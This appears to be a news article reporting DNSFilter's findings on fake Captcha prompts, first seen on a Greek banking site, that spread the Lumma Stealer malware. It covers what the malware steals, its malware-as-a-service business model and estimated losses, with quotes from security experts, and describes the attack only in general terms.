Introduction
A new report from cybersecurity company DNSFilter has unveiled that malicious actors are employing deceptive Captcha prompts as a means to disseminate Lumma Stealer malware, a sophisticated tool that primarily targets Windows users. The initial identification of this threat occurred on a banking site in Greece, where users were misled into copying a prompt into their system’s Run dialog and executing it by pressing Enter.
Key Findings
In an alarming finding over just three days, 23 instances of interaction with this counterfeit Captcha were recorded among DNSFilter’s clientele. Approximately 17% of those who encountered the prompt followed through with the harmful instructions, leading to attempts at malware installation.
Mechanics of Lumma Stealer
Mikey Pruitt, DNSFilter’s Global Partner Evangelist, detailed the mechanics of Lumma Stealer, highlighting that it scours infected devices for sensitive information, ranging from browser-stored passwords and cookies to cryptocurrency wallet data and two-factor authentication tokens.
Pruitt explained that the extracted data is often exploited for financial gain, contributing to identity theft and fraudulent online transactions involving access to victims’ cryptocurrency holdings.
Malware-as-a-Service Model
The nature of this malware, which operates under the Malware-as-a-Service (MaaS) model, has contributed to an uptick in cyber threats in recent years. According to ESET malware analyst Jakub Tomanek, the creators behind Lumma Stealer are actively enhancing its capabilities to avoid detection while also establishing domains to facilitate its operations. He described it as a sustainable business model for cybercriminals who collect subscription fees from affiliates, allowing them to avoid the complexities of developing their own malicious software.
Resurgence and Financial Impact
Despite efforts from law enforcement, including the U.S. Department of Justice’s seizure of domains used for Lumma Stealer in May, the malware has returned, with Trend Micro identifying a resurgence in targeted attacks during July. The affordability of subscriptions—available for as low as $250 on dark web forums—adds to the appeal for cybercriminals, who can then focus on what they do best: targeting high-value assets such as cryptocurrency wallets and authentication systems.
Estimated Losses
Nathaniel Jones, a security expert from Darktrace, indicated that losses attributed to Lumma Stealer reached an estimated $36.5 million in 2023 alone, with around 400,000 Windows devices being compromised within two months.
The alarming aspect is not just the financial figures but the multifaceted approach to monetizing stolen data, including harvesting browser histories and system configurations before sending this data to command centers purportedly in Russia.
Long-term Consequences
Furthermore, experts indicate that stolen credentials often flow directly into organized groups that specialize in the resale of such data, creating a ripple effect of security breaches, including bank fraud and identity theft that can persist long-term post-infection. Though discourse around an alleged Russian origin for Lumma Stealer continues, Pruitt emphasized the multinational collaboration often present in these cybercriminal enterprises, indicating that various actors may be involved across multiple regions, taking advantage of international servers and distribution networks.
